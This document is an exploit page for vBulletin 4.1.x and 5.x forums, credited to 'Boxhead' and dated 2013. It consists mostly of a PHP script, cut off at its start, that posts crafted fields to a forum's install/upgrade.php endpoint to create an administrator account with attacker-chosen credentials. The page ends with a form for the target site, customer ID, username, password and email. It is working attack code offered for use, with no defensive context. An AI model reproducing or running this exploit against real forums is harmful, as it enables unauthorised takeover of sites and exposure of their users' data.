vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit

Created by: Boxhead

Found on: 08/22/2013

Website: http://belegit.net


urlencode('1'), 'version' => urlencode('install'), 'checktable' => urlencode('false'), 'firstrun' => urlencode('false'), 'step' => urlencode('7'), 'startat' => urlencode('0'), 'only' => urlencode('false'), 'customerid' => urlencode($_POST['customerid']), 'options[skiptemplatemerge]' => urlencode('0'), 'response' => urlencode('yes'), 'htmlsubmit' => urlencode('1'), 'htmldata[username]' => urlencode($_POST['username']), 'htmldata[password]' => urlencode($_POST['password']), 'htmldata[confirmpassword]' => urlencode($_POST['password']), 'htmldata[email]' => urlencode($_POST['email']) ); //url-ify the data for the POST foreach ($fields as $key => $value) { $fields_string .= $key . '=' . $value . '&'; } rtrim($fields_string, '&'); //open connection $ch = curl_init(); //set the url, number of POST vars, POST data curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, count($fields)); curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string); curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE); curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid=' . $_POST['customerid']); //execute post $result = curl_exec($ch); //close connection curl_close($ch); exit(); } ?>
Example:http://test.com/forum/install/upgrade.php
Website:
Customer ID:
Username:
Password:
Email: